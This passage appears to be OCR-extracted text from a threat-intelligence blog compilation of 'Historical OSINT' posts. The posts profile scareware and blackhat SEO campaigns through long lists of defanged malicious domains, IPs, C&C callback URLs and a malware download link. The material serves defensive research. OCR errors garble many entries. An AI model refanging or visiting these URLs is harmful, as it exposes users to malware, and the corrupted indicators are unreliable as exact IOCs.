
hxxpV/rikxeduq.cn 

hxxp://mifzoy uq.cn 

hxxp://j itmekar.cn 

hxxp://zedbeper.cn 

hxxp://qoyrifir.cn 

hxxp://rerbog ir.cn 



hxxp://nexyutir.cn 

hxxp://y uvwobor.cn 

hxxp://raddijor.cn 

hxxp://rehci ror.cn 

hxxp://jowqasor.cn 

hxxp://wotrisor.cn 

hxxp://tinselur.cn 

hxxp://sacvakes.cn 

hxxp://xonlefis.cn 

hxxp://seh wukos.cn 

hxxp://torxupos.cn 

hxxp://yujzidus.cn 

hxxp://dejzezat.cn 

hxxp://gunjivet.cn 
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hxxp://hecfocav.cn 

hxxp://yuxdiqav.cn 

hxxp://guysogiv.cn 

hxxp://tebziniv.cn 

hxxp://dedsupov.cn 



hxxp://gen wsxov.cn 

hxxp://xaycozuv.cn 

hxxp://fojgoraw.cn 

hxxp://su wsozaw.cn 

hxxp://hucl wuhew.cn 

hxxp://momzu hew.cn 

hxxp://pi bwokiw.cn 

hxxp://lacfimiw.cn 

hxxpV/jubduriw.cn 

hxxp://talcuviw.cn 

hxxp://xavgu bow.cn 

hxxp://zovcofow.cn 

hxxp://qopzubax.cn 

hxxpV/dogqodax.cn 

hxxp://jimjakax.cn 

hxxp://ricnafex.cn 

hxxp://nad lewex.cn 

hxxp://mokcegox.cn 

hxxp://getkixox.cn 

hxxp://wucpulux.cn 



hxxp://dalpobay.cn 

hxxp://refhagay.cn 

hxxp://j usyadey.cn 

hxxp://reqpijey.cn 

hxxp://vebzaqiy.cn 

hxxp://sejtogoy.cn 

hxxp://y ecnaquy.cn 

hxxp://xufg uyuy.cn 

hxxp://puktunaz.cn 

hxxp://zaztuvaz.cn 

hxxp://sixbufiz.cn 

hxxp://nofdowiz.cn 

hxxp://cu vxoqoz.cn 

hxxp://y ugkiwuz.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp://columnultra.com - 58.17.3.41 

hxxp://mi I khold.com 

hxxp://eagerboard.com 

hxxp://yeson lynoun.com 



hxx p ://d iffe rd 0. CO m 
hxxp://seemly keep.com 
hxxp://seemnear.com 
hxxp://modern but.com 
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Related malicious domains known to have 
participated in the campaign: 

hxxp://litgukab.cn 

hxxp://xojyupab.cn 

hxxp://ritlarab.cn 

hxxp://qeqyukeb.cn 

hxxp://fedpijib.cn 

hxxp://xu mlodob.cn 

hxxp://kozgewob.cn 

hxxp://fajnahec.cn 

hxxp://nedsicic.cn 

hxxp://hertuqic.cn 

hxxp://linrudoc.cn 

hxxp://gilqufuc.cn 

hxxp://lijwituc.cn 



hxxp://loqbaxuc.cn 

hxxp://ca mxezuc.cn 

hxxp://foyxolacl.cn 

hxxp://bapvusacl.cn 

hxxp://wokmeyacl.cn 

hxxp://yizqosecl.cn 

hxxp://vi vwiwef.cn 

hxxp://percaqof.cn 

hxxp://cepceluf.cn 

hxxp://paqhizuf.cn 

hxxp://vorvi vag.cn 

hxxp://may nixeg.cn 

hxxp://mujyu mig.cn 

hxxpV/coyrekog.cn 

hxxp://xetvetih.cn 

hxxp://mugyuj uh.cn 

hxxp://supsizuh.cn 

hxxp://bixtakaj.cn 

hxxp://ianmixej.cn 

h XX p://wo rxezej.cn 



hxxp://tikgepij.cn 

hxxp://yatsanak.cn 

hxxp://tucgosak.cn 

hxxp://hihnuwak.cn 

hxxp://qilfadek.cn 

hxxp://zibsitik.cn 

hxxp://xetmojok.cn 

hxxp://yelsecuk.cn 

hxxp://confowuk.cn 

hxxp://pozzoxuk.cn 

hxxp://savhixal.cn 

hxxp://nudtaqel.cn 

hxxp://keptavol.cn 

hxxp://berq ufam.cn 

hxxp://wuq rulam.cn 

hxxp://gofti wam.cn 
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hxxp://vowcajem.cn 

hxxp://rizfinim.cn 

hxxp://jetgekom.cn 



hxxp://letjucun.cn 

hxxp://wi vwiqap.cn 

hxxp://duccesap.cn 

hxxp://za my isap.cn 

hxxp://ranpovep.cn 

hxxpV/kucdawep.cn 

hxxp://iimjapip.cn 

hxxp://ciggecop.cn 

hxxp://ziybeiop.cn 

hxxpV/yakquyeq.cn 

hxxp://borremiq.cn 

hxxp://vuzwesuq.cn 

hxxp://rosvocor.cn 

hxxp://hakdugas.cn 

hxxp://ka bmebes.cn 

hxxp://purhuves.cn 

hxxp://gopmocis.cn 

hxxp://cabziqis.cn 

hxxp://pomzonos.cn 

hxxp://zojvapus.cn 



hxxp://nobfemat.cn 

hxxp://ritcubav.cn 

hxxp://bibbikev.cn 

hxxp://daslulev.cn 

hxxp://naczoduv.cn 

hxxp://betjoqiw.cn 

hxxp://yoq lamow.cn 

hxxp://j awjeqow.cn 

hxxp://zijmivuw.cn 

hxxp://d upqozuw.cn 

hxxp://fatnudax.cn 

hxxp://defrogax.cn 

hxxp://kalyahax.cn 

hxxp://toztipax.cn 

hxxp://gecfopax.cn 

hxxp://wuqzu bex.cn 

hxxp://hexpadix.cn 

hxxp://luhnukox.cn 

hxxp://vecbibey.cn 

hxxp ://d i mgecey.cn 



hxxp://fammuvey.cn 

hxxp://zepfabiy.cn 

hxxp://gewvamiy.cn 

hxxp://pekzariy.cn 

hxxp://pixkinaz.cn 

hxxp://mecqu lez.cn 

hxxp://yubreliz.cn 
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hxxp://juvmeriz.cn 

hxxp://mafcixiz.cn 

hxxp://butlezoz.cn 

hxxp://xisqapuz.cn 

hxxp://jihkohab.cn 

hxxp://litgukab.cn 

hxxp://xojyupab.cn 

hxxp://ritlarab.cn 

hxxp://qancabeb.cn 

hxxp://xaqkabeb.cn 

hxxp://qeqyukeb.cn 

hxxp://bobhoneb.cn 



hxxp://fedpijib.cn 

hxxp://kozgewob.cn 

hxxp://mirlacub.cn 

hxxp://jokrogub.cn 

hxxp://qupbihac.cn 

hxxp://viqnijac.cn 

hxxp://bucdawac.cn 

hxxp://latzoyac.cn 

hxxp://ferkogec.cn 

hxxp://qujqugec.cn 

hxxp://fajnahec.cn 

hxxp://saybilec.cn 

hxxp://yaxxosec.cn 

hxxp://nedsicic.cn 

hxxp://cimhijic.cn 

hxxp://hertuqic.cn 

hxxp://linrudoc.cn 

hxxp://mah hekoc.cn 

hxxp://pegvijuc.cn 

hxxp://ca mxezuc.cn 



hxxp://kossehad.cn 

hxxp://bapvusad.cn 

hxxp://coffebed.cn 

hxxp://xadjeqid.cn 

hxxp://pehxarid.cn 

hxxp://maknohod.cn 

hxxp://yujhaqod.cn 

hxxp://vevteyod.cn 

hxxp://ri nmumud.cn 

hxxp://xuldeyud.cn 

hxxp://fed rujaf.cn 

hxxp://n ugnosaf.cn 

hxxp://koxpelef.cn 

hxxp://tecyatef.cn 

hxxp://hemfowef.cn 

hxxp://pavlegif.cn 

hxxp://percaqof.cn 

hxxp://sizkeyof.cn 
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hxxp://zug kucuf.cn 



hxxp://rijhuhuf.cn 

hxxp://cepceluf.cn 

hxxp://paqhizuf.cn 

hxxp ://xowj icag .cn 

hxxp://dofpalag.cn 

hxxp://hujrulag.cn 

hxxp://maxtayag.cn 

hxxp://qekvoceg.cn 

hxxp ://vazwu reg.cn 

hxxp://pilpuweg.cn 

hxxp ://wed ru weg .cn 

hxxp://cexkezeg.cn 

hxxp ://mujyu mig.cn 

hxxp://wintabog.cn 

hxxp ://n uzmohog.cn 

hxxp://coyrekog.cn 

hxxp ://tu bvuxog.cn 

hxxp://zavdahug.cn 

hxxp://yukpikug.cn 

hxxp ://mu wsikeh.cn 



hxxp://pecculeh.cn 
hxxp://rafniteh.cn 
hxxp://n ukfijih.cn 
hxxp://xetvetih.cn 
hxxp://tikbacoh.cn 
hxxp://zi kwufuh.cn 
hxxp://mugyuj uh.cn 
hxxp://hijbumuh.cn 
hxxp://wu bxayuh.cn 
hxxp://quntoyuh.cn 
hxxp://supsizuh.cn 
hxxp://techegaj.cn 
hxxp://bixtakaj.cn 
hxxp://wu wbeqaj.cn 
hxxp://caqhiqaj.cn 
hxxp://l ijzarej.cn 
hxxp://lanmixej.cn 
hxxp://j utzuzej.cn 
hxxp://betkawij.cn 
hxxp://mu mrojoj.cn 



hxxp://wu I kukoj.cn 

hxxp://selqetuj.cn 

hxxp://zu vbowuj.cn 

hxxp://sevpohak.cn 

hxxp://qusvilak.cn 

hxxp://qowri rak.cn 

hxxp://tucgosak.cn 

hxxp://bajhukek.cn 

hxxp://qeyzecik.cn 
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hxxpV/pijridik.cn 

hxxp://y ecgajik.cn 

hxxp://tovboqik.cn 

hxxp://sirrotik.cn 

hxxp://pomzexik.cn 

hxxp://nopvafok.cn 

hxxp://xetmojok.cn 

hxxp://fuqzuxok.cn 

hxxp://xaj kimuk.cn 

hxxp://confowuk.cn 



hxxp://pozzoxuk.cn 

hxxp://vufmi kal.cn 

hxxp://korkusal.cn 

hxxp://yasdaxal.cn 

hxxp://nibnupel.cn 

hxxp://nudtaqel.cn 

hxxp://zivwirel.cn 

hxxp://facjacil.cn 

hxxp://qaqdidil.cn 

hxxp://zirmidil.cn 

hxxp://pivteqil.cn 

hxxp://mutzomol.cn 

hxxp://bahfosol.cn 

hxxp://kajvatol.cn 

hxxp://keptavol.cn 

hxxp://mevvuqul.cn 

hxxp://berq ufam.cn 

hxxp://zi hwujam.cn 

hxxp://jormofem.cn 

hxxp://vowcajem.cn 



hxxp ://yawy ibim.cn 

hxxp://mi byumim.cn 

hxxpV/pabfakom.cn 

hxxpV/jetgekom.cn 

hxxp://xoikizom.cn 

hxxp ://mujsi kum.cn 

hxxp ://moy nukan.cn 

hxxp://ranfeian.cn 

hxxp://kayjamen.cn 

hxxpV/kudcedon.cn 

hxxp://getwison.cn 

hxxp://givjivon.cn 

hxxp://faykirun.cn 

hxxp://zebxaxun.cn 

hxxp://cociecap.cn 

hxxp://texnipap.cn 

hxxp://humyipap.cn 

hxxp://duccesap.cn 

hxxp ://za my isap.cn 

hxxp://iunyicep.cn 
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hxxp://ranpovep.cn 

hxxp://yifkebip.cn 

hxxp://yiryemip.cn 

hxxp://mowmoq ip.cn 

hxxp://wozh ihop.cn 

hxxp://mefrexop.cn 

hxxp://qiciyubup.cn 

hxxp://qicijohup.cn 

hxxp://iotjoiup.cn 

hxxpV/dirdotup.cn 

hxxp://memqowaq.cn 

hxxp://ci vvufeq.cn 

hxxp://bobfiiiq.cn 

hxxp://borremiq.cn 

hxxp://singuroq.cn 

hxxp://qudjuvoq.cn 

hxxp://vuzwesuq.cn 

hxxp://n uvmotuq.cn 

hxxp://zohcidar.cn 



hxxp://rentu mar.cn 

hxxp://fi pzaqar.cn 

hxxp://siqcatar.cn 

hxxp://sagvitar.cn 

hxxp://luqsiger.cn 

h XX p: //z u y xe we r. c n 

hxxp://jagnuyer.cn 

hxxp://ruhbulir.cn 

hxxp://sityeyir.cn 

hxxp://rosvocor.cn 

hxxp://julxapor.cn 

hxxp://rixlupur.cn 

hxxp://j utfisur.cn 

hxxp://fabmotur.cn 

hxxp://bukpuzur.cn 

hxxp://pozsigas.cn 

hxxp://hakclugas.cn 

hxxp://lokzihas.cn 

hxxp://mu kkebes.cn 

hxxp://mijpecles.cn 



hxxp://conzakes.cn 

hxxp://fod bemes.cn 

hxxp://maqpumes.cn 

hxxp://purhuves.cn 

hxxp://hohgibis.cn 

hxxp://kezyubis.cn 

hxxp://gopmocis.cn 

hxxp://soqsedis.cn 

hxxp://defdoris.cn 

hxxp://pomzonos.cn 

hxxp://lanhovus.cn 
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We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild Drops Scareware (2018-10-21 
23:55) It's 2008 and I've recently stumbled upon a currently 
active malicious and fraudulent blackhat SEO campaign 

successfully enticing users into falling victim into fake 
security software also known as scareware including a variety 

of dropped fake codecs largely relying on the acquisition of 
legitimate traffic through active blackhat SEO campaigns 



in this particular case various North Korea news including 
Mike Tyson's daughter themed campaigns. 

Related malicious domains and redirectors known to 
have participated in the campaign: 

hxxp://fi97.net 

hxxp://is-the-boss.com - Email: dantsr(g)gmail.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://north-korea-news.moviegator.us 

Related malicious domains known to have 
participated in the campaign: 

hxxp://petrenko.biz 

Related malicious domains known to have 
participated in the campaign: 

hxxp://teensxporn.com - 66.197.165.41 - Email: 
robertxssmith(g)goog lemail.com 

hxxp://a prettygirls.com 

hxxp://a nalporntube.com 

hxxp://tuexxxteen.com 

hxxp://ltu bexxx.com 

hxxp://teen boobstube.com 

hxxp://tu bexxxteen.com 



Related rogue YouTube accounts known to have 
participated in the campaign: 

hxxp://www.youtu be.com/user/afohebac5ar 

hxxp://www.youtube.com/user/irufupolOop 

Related malicious domains known to have 
participated in the campaign: 

hxxp://get-mega-tube.com - 216.240.143.7 

hxxp://get-mega-tu be.com 

hxxp://my-flare-tu be.com 

hxxp://best-crystal-tu be.com 

hxxp://powerful-tu be.com 

hxxp://cheery-tube-portal.com 

hxxp://jazzy-tu bs.com 

hxxpV/video-tube-dot.com 

hxxp://my-tube-show.com 

Once executed a sample malware phones back to the 
following malicious C &C server IPs: 

hxxp://mgj mnfgbdfb.com/fff9999.php 

hxxp://mgj mnfgbdfb.com/eee9999.php 

Once executed a sample malware phones back to the 
following malicious C &C server IPs: 



hxxp://i mageempires.com/perce/9dc0266f8077f4b2cd9411e 
d48ecdda988af00003bl280c 


47e899830c09969686e8ccfe804c2a7ce5/c0a/perce.jpg 

hxxp://i magescolor.com/item/adb0765f302764425d74cl2df 
84cbd29185f9070bb2230a 

42e0958e050299908delc5f0844c2579e3/20c/item.gif 
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hxxp://picturehappiness.com/werber/207/216.jpg 
hxxp://a rchiveexefiies09.com/fiie.exe 

Related malicious URLs known to have participated in 
the campaign: 

h XX p ://a rc h i veexefi i esO 9. co m/softwa ref o rtu bev i e w.45016. exe 

Related malicious URLs known to have participated in 
the campaign: 

hxxp://archiveexefiies09.com - 91.212.65.54 
hxxp://exefi iesstorage.com 
hxxp://exearchstortage.com 
hxxp://g randfiiesstore.com 
hxxp://a rch-grandsoftarchive.com 
hxxp://hex-prog rammers.com 



hxxp://kir-fi leplanet.com 


We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - A Diversified Portfolio of Fake 
Security Software (2018-10-22 13:33) 

It's 2010 and I've recently stumbled upon a currently active 
and circulating malicious and fraudulent porfolio of 

fake security software also known as scareware potentially 
enticing hundreds of thousands of users to a multi-tude 

of malicious software with the cybercriminals behind the 
campaign potentially earning fraudulent revenue in the 

process of monetizing access to malware-infected hosts 
largely relying on the utilization of an affiliate network-based 

type of revenue sharing scheme. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://thebest-antivirusOO.com - 91.212.226.203; 
94.228.209.195 

hxxp://vi russcannerproO.com 

hxxp://l ightandfastscanner01.com 

hxxp://thebest-anti virus01.com 

hxxp://thebestanti virus01.com 



hxxp ://remove-spy ware-11 .com 
hxxp://remove-vi rus-ll.com 
hxxp ://thebest-anti virusll.com 
hxxp ://antispyware-moclu lei.com 
hxxp ://a ntispywaremoclulel.com 
hxxp ://a ntivirus-toolsrl.com 
hxxp ://thebest-anti virusl.com 
hxxp ://thebest-anti virusxl.com 
hxxp://thebestantivirus02.com 
hxxp://remove-spyware-12.com 
hxxp ://remove-vi rus-12.com 
hxxp ://clelete-al l-virus-22.com 
hxxp ://l ightanclfastscanner22.com 
hxxp://prosecureprotection2.com 
hxxp ://vi russcannerpro2.com 
hxxp ://a ntivirus-toolsr2.com 
hxxp ://thebest-anti virusx2.com 
hxxp ://thebestanti virus03.com 
hxxp ://remove-spy ware-13.com 
hxxp ://remove-vi rus-13.com 



hxxp://a ntispyware-module3.com 
hxxp://a ntispywaremodule3.com 
hxxp://vi russcannerpro3.com 
hxxp://wi ndowsantivirusserver3.com 
hxxp://thebest-anti virusx3.com 
hxxp://thebestanti virus04.com 
hxxp://remove-spy ware-14.com 
hxxp://remove-vi rus-14.com 
hxxp://a ntispyware-scann4.com 
hxxp://a ntivirus-tooisr4.com 
hxxp://thebest-anti virusx4.com 
hxxp://thebestanti virus05.com 
hxxp://remove-ai i-spyware-55.com 
hxxp://deiete-ai i-virus-55.com 
hxxp://thebest-anti virusx5.com 
hxxp://remove-spy ware-16.com 
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hxxp://i ightandfastscanner66.com 
hxxp://a ntispywaremoduie6.com 
hxxp://a ntispyware-moduie7.com 



hxxp://a ntispywaremodule7.com 
hxxp://a ntivirus-toolsr7.com 
hxxp://a ntispyware-scann8.com 
hxxp://pro-secure-protection8.com 
hxxp://wi ndowsantivirusserver8.com 
hxxp://a ntispyware-moduie9.com 
hxxp://a ntispywaremoduie9.com 
hxxp://a ntispyware-scann9.com 
hxxp://vi russcannerpro9.com 
hxxp://a ntivirus-tooisr9.com 
hxxp://thebest-anti virus9.com 
hxxp://a ntivirusprolscan.com 
hxxp://a ntiviruspro2scan.com 
hxxp://a ntiviruspro7scan.com 
hxxp://a ntiviruspro8scan.com 
hxxp://a ntiviruspro9scan.com 
hxxp://a ntispyware6sacnner.com 
hxxp://a ntivirusvltoois.com 
hxxp://a ntispywarelOwindows.com 
hxxp://a ntispyware20windows.com 



hxxp://a ntivirus-toolsvv.com 
hxxp ://remove-spy ware-11 .com 
hxxp://remove-vi rus-ll.com 
hxxp://remove-spyware-12.com 
hxxp ://remove-vi rus-12.com 
hxxp ://cieiete-ai i-virus-22.com 
hxxp://prosecureprotection2.com 
hxxp://remove-spyware-13.com 
hxxp ://remove-vi rus-13.com 
hxxp ://wi nciowsantivirusserver3.com 
hxxp ://remove-spy ware-14.com 
hxxp ://remove-vi rus-14.com 
hxxp ://remove-ai i-spyware-55.com 
hxxp ://cieiete-ai i-virus-55.com 
hxxp ://remove-spy ware-16.com 
hxxp://pro-secure-protection8.com 
hxxp ://wi nciowsantivirusserver8.com 
hxxp ://a ntivirus-tooisr9.com 
hxxp ://a ntivirusvltoois.com 
hxxp ://a ntispywarelOwinciows.com 



hxxp://a ntispyware20windows.com 

hxxp://a ntivirus-tooisvv.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://run-anti virusscanO.com 

hxxp://ru nantivirusscanO.com 

hxxp ://remove-spy ware-11 .com 
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hxxp ://remove-vi rus-ll.com 
hxxp ://run-vi rus-scannerl.com 
hxxp://remove-spyware-12.com 
hxxp ://remove-vi rus-12.com 
hxxp ://deiete-ai i-virus-22.com 
hxxp ://remove-spy ware-13.com 
hxxp ://remove-vi rus-13.com 
hxxp ://ru nantivirusscan3.com 
hxxp ://ru n-virusscanner3.com 
hxxp ://remove-spy ware-14.com 
hxxp ://remove-vi rus-14.com 
hxxp ://ru n-virusscanner4.com 



hxxp://remove-vi rus-15.com 

hxxp://remove-al l-spyware-55.com 

hxxp://clelete-al l-virus-55.com 

hxxp://remove-spy ware-16.com 

hxxp://ru n-virus-scanner6.com 

hxxp://ru n-virusscanner6.com 

hxxp://ru nantivirusscan8.com 

hxxp://ru n-virus-scanner8.com 

hxxp://wi nciowsantivirusserver8.com 

hxxp://ru n-virus-scanner9.com 

hxxp://ru n-virusscanner9.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://run-anti virusscanO.com 

hxxp://run-anti virusscanl.com 

hxxp://ru n-antivirusscan3.com 

hxxp://ru n-antivirusscan6.com 

hxxp://ru n-antivirusscan8.com 

hxxp://ru nantivirusscanO.com 

hxxp://ru nantivirusscan3.com 



hxxp://ru nantivirusscan4.com 

hxxp://ru nantivirusscan9.com 

hxxp://secu repro-antivirusl.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://a nti-virus-systemO.com 

hxxp://run-anti virusscanO.com 

hxxp://ru nantivirusscanO.com 

hxxp://perform-anti virus-scan-1.com 

hxxp ://remove-spy ware-11 .com 

hxxp://remove-vi rus-ll.com 

hxxp ://a ntivirus-systeml.com 

hxxp ://performspy warescanl.com 

hxxp ://run-vi rus-scannerl.com 

hxxp://remove-spyware-12.com 

hxxp ://remove-vi rus-12.com 

hxxp ://cieiete-ai i-virus-22.com 

hxxp ://a ntivirus-scanner-3.com 
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hxxp ://remove-spy ware-13.com 



hxxp://remove-vi rus-13.com 
hxxp://ru nantivirusscan3.com 
hxxp://ru n-virusscanner3.com 
hxxp://remove-spy ware-14.com 
hxxp://remove-vi rus-14.com 
hxxp://g ioriousantivirus2014.com 
hxxp://ru n-virusscanner4.com 
hxxp://smart-pcscan ner05.com 
hxxp://remove-vi rus-15.com 
hxxp://remove-ai i-spyware-55.com 
hxxp://cieiete-ai i-virus-55.com 
hxxp://perform-vi rus-scan5.com 
hxxp://perform-anti virus-scan-6.com 
hxxp://a ntivirus-scanner-6.com 
hxxp://remove-spy ware-16.com 
hxxp://ru n-virus-scanner6.com 
hxxp://ru n-virusscanner6.com 
hxxp://a ntivirus-scan-server6.com 
hxxp://perform-anti virus-scan-7.com 
hxxp://perform-anti virus-test-7.com 



hxxp://a ntivirus-win-system7.com 

hxxp://a ntivirus-for-pc-8.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://perform-anti virus-scan-8.com 

hxxp://perform-anti virus-test-8.com 

hxxp://ru n-antivirusscan8.com 

hxxp://ru nantivirusscan8.com 

hxxp://ru n-virus-scanner8.com 

hxxp://wi nciowsantivirusserver8.com 

hxxp://perform-anti virus-test-9.com 

hxxp://perform-vi rus-scan9.com 

hxxp://a ntispywareinfo9.com 

hxxp://ru n-virus-scanner9.com 

hxxp://ru n-virusscanner9.com 

hxxp://a ntispyware06scan.com 

hxxp://a ntispywareinfo9.com 

hxxp://antivi rus-for-pc-2.com 

hxxp://antivi rus-for-pc-4.com 

hxxp://a ntivirus-for-pc-6.com 



hxxp://a ntivirus-for-pc-8.com 
hxxp://a ntiviruspro8scan.com 
hxxp://extra-anti virus-scanl.com 
hxxp://extra-secu rity-scanbl.com 
hxxp://run-anti virusscanO.com 
hxxp://run-anti virusscanl.com 
hxxp://ru n-antivirusscan3.com 
hxxp://ru n-antivirusscan6.com 
hxxp://ru n-antivirusscan8.com 
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hxxp://ru nantivirusscanO.com 

hxxp://ru nantivirusscan3.com 

hxxp://ru nantivirusscan4.com 

hxxp://ru nantivirusscan9.com 

hxxp://secu repro-antivirusl.com 

hxxp://su per-scanner-2004.com 

hxxp://top-ratean rivirusO.com 

hxxp://topa ntimaiware-scanner7.com 

We'ii continue monitoring the campaign and post updates 
soon as new deveiopments take piace. 



167 


Historical OSINT - A Diversified Portfolio of Fake 
Security Software Spotted in the Wild (2018-10-22 
13:40) It's 2010 and I've recently stumbled upon yet 
another malicious and fraudulent domain portfolio serving a 
variety of 

fake security software also known as scareware potentially 
exposing hundreds of thousands of users to a variety of 

fake security software with the cybercriminals behind the 
campaign potentially earning fraudulent revenue largely 

relying on the utilization of an affiliate-network based type of 
revenue-sharing scheme. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://50vi rus-scanner.com 

hxxp://700vi rus-scanner.com 

hxxp://a ntivirus-test66.com 

hxxp://a ntivirus200scanner.com 

hxxp://a ntivirus600scanner.com 

hxxp://a ntivirus800scanner.com 

hxxp://a ntivirus900scanner.com 

hxxp://av-scan ner200.com 

hxxp://av-scan ner300.com 



hxxp://av-scan ner400.com 
hxxp://av-scan ner500.com 
hxxp://i netproscan031.com 
hxxp://i nternet-scan020.com 
hxxp://novi rus-scanOO.com 
hxxp://stopvi rus-scanll.com 
hxxp://stopvi rus-scanl3.com 
hxxp://stopvi rus-scanl6.com 
hxxp://stopvi rus-scan33.com 
hxxp://vi rus66scanner.com 
hxxp://vi rus77scanner.com 
hxxp://vi rus88scanner.com 
hxxp://a ntivirus-scan200.com 
hxxp://a ntispy-scan200.com 
hxxp://av-scan ner200.com 
hxxp://av-scan ner300.com 
hxxp://a ntivirus-scan400.com 
hxxp://a ntispy-scan400.com 
hxxp://av-scan ner400.com 
hxxp://av-scan ner500.com 



hxxp://a ntivirus-scan600.com 

hxxp://antispy-scan600.com 

hxxp://a ntivirus-scan700.com 

hxxp://a ntispy-scan700.com 

hxxp://av-scan ner700.com 

hxxp://antispy-scan800.com 

hxxp://a ntivirus-scan900.com 

hxxp://novi rus-scan00.com 

hxxp://stop-vi rus-010.com 

hxxp://spy warescan010.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://a ntispywareheip010.com 
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hxxp://i nternet-scan020.com 
hxxp://i nternet-scanner020.com 
hxxp://i nsight-scan20.com 
hxxp://i nternet-scanner030.com 
hxxp://stop-vi rus-040.com 
hxxp://i nternet-scan040.com 



hxxp://i nsight-scan40.com 
hxxp://i nternet-scan050.com 
hxxp://i nternet-scanner050.com 
hxxp://i nsight-scan60.com 
hxxp://stop-vi rus-070.com 
hxxp://i nternet-scan070.com 
hxxp://i nternet-scanner070.com 
hxxp://i nsight-scan80.com 
hxxp://stop-vi rus-090.com 
hxxp://i nternet-scan090.com 
hxxp://i nternet-scanner090.com 
hxxp://i nsight-scan90.com 
hxxpV/antispywareheipkO.com 
hxxp://i netproscan001.com 
hxxp://novi rus-scan01.com 
hxxp://spyware-stop01.com 
hxxp://a ntivirus-inet01.com 
hxxp://stopvi rus-scanll.com 
hxxp://i netproscan031.com 
hxxp://novi rus-scan31.com 



hxxp://a ntivirus-inet31.com 

hxxp://novi rus-scan41.com 

hxxp://antivi rus-inet41.com 

hxxp://a ntivirus-inet51.com 

hxxp://i netproscan061.com 

hxxp://novi rus-scan61.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://i netproscan081.com 

hxxp://novi rus-scan81.com 

hxxp://i netproscan091.com 

hxxp://spyware-stopbl.com 

hxxp://spy ware-stopml.com 

hxxp://spyware-stopnl.com 

hxxp://spyware-stopzl.com 

hxxp://a ntispywareheip002.com 

hxxp://a ntispywareheip022.com 

hxxp://novi rus-scan22.com 

hxxp://antispywareheipi<2.com 

hxxp://i nsight-scanner2.com 



hxxp://spywarescan013.com 
hxxp://stopvi rus-scanl3.com 
hxxp://novi rus-scan33.com 
hxxp://stopvi rus-scan33.com 
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hxxp://a ntispywarehelp004.com 
hxxp://a ntispywarehelpk4.com 
hxxp://spywarescan015.com 
hxxp://novi rus-scan55.com 
hxxp://i nsight-scanner5.com 
hxxp://stopvi rus-scanl6.com 
hxxp://stopvi rus-scan66.com 
hxxp://a ntispywarehelpk6.com 
hxxp://spy warescan017.com 
hxxp://i nsight-scanner7.com 
hxxp://a ntispywarehelp008.com 
hxxp://spy warescan018.com 
hxxp://stopvi rus-scanl8.com 
hxxp://novi rus-scan88.com 
hxxp://stopvi rus-scan88.com 



hxxp://a ntivirus-test88.com 

hxxp://antispywareheipi<8.com 

hxxp://i nsight-scanner8.com 

hxxp://i nsight-scanner9.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://10scanantispyware.com 

hxxp://2 Oscanantispyware.com 

hxxp://30scanantispyware.com 

hxxp://60scanantispyware.com 

hxxp://80scanantispyware.com 

hxxp://2scanantispyware.com 

hxxp://3scanantispyware.com 

hxxp://5scanantispyware.com 

hxxp://7scanantispyware.com 

hxxp://8scanantispyware.com 

hxxp://spy ware200scan.com 

hxxp://spyware500scan.com 

hxxp://spyware800scan.com 

hxxp://spyware880scan.com 



hxxp://50vi rus-scanner.com 
hxxp://90vi rus-scanner.com 
hxxp://a ntivirus900scanner.com 
hxxp://a ntiviruslOscanner.com 
hxxp://vi rus77scanner.com 
hxxp://vi rus88scanner.com 
hxxp://net00 lantivirus.com 
hxxp://netO llantivirus.com 
hxxp://netl llantivirus.com 
hxxp://net02 lantivirus.com 
hxxp://net-02a ntivirus.com 
hxxp://net2 2 2antivirus.com 
hxxp://net-04a ntivirus.com 
hxxp://net-05a ntivirus.com 
hxxp://net-07a ntivirus.com 
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We'ii continue monitoring the campaign and post updates 
soon as new deveiopments take piace. 
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Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild Serves Scareware (2018-10-22 



14:05) It's 2010 and I've recently stumbled upon a currently 
active and circulating malicious and fraudulent blackhat SEO 

campaign successfully enticing hundreds of thousands 
globally into interacting with a multi-tude of rogue and 

malicious software also known as scareware. 

In this post I'll profile the campaign discuss in-depth the 
tactics techniques and procedures of the cybercrimi¬ 
nals behind it and provide actionable intelligence on the 
infrastructure behind it. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://ozeqiod.cn?uid = 213 - redirector - 64.86.25.201 - 
hxxp://bexwuq.cn 

Sample URL redirection chain: 

hxxp://ymarketcoms.cn/?pid = 123 

Related malicious domains known to have responded 
to the same malicious C &C server IPs (64.86.25.201): 

hxxp://bombasl01.com 

hxxp://trhtrtrbtrtbtb.com 

hxxp://opensearch-zone.com 

hxxp://imaera.cn 

hxxp://ari exa.cn 

hxxp://ozeqiod.cn 



hxxp://ariysle.cn 
hxxp://ajegif.cn 
hxxp://adiyki.cn 
hxxp://acaisek.cn 
hxxp://yvamuer.cn 
hxxp://protecti nstructor.cn 
hxxp://blansh in blansh.net 
hxxp://kosti nporest.net 

Related malicious domains known to have 
participated in the campaign: 

hxxp://azikyxa.cn 

hxxp://befaqki.cn 

hxxp://ataini.cn 

hxxp://atoycri.cn 

hxxp://bimpuj.cn 

hxxp://bekajop.cn 

hxxp://bexwuq.cn 

hxxp://azy woax.cn 

hxxp://azaijy.cn 

We'll continue monitoring the campaign and post updates 
soon as new developments take place. 
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Historical OSINT - Malicious Economies of Scale - The 
Emergence of Efficient Platforms for Exploitation - 

2007 (2018-10-22 16:23) 

Dear blog readers it's been several years since I last posted a 
quality update following my [1]2010 disappearance. As 
it's been quite a significant period of time since I last posted 
a quality update I feel it's about time I post an quality 

update by detailing the Web Malware Exploitation market 
segment circa 2007 prior to my visit to the GCHQ as an 

independent contractor with the [2]Honeynet Project. 

In this post I'll discuss the rise of Web malware exploitation 
kits circa 2007 and offer in-depth discussion on 

the current and emerging tactics techniques and procedures 
(TTPs) of the cybercriminals behind it. With cyber¬ 
criminals continuing to actively rely on the exploitation of 
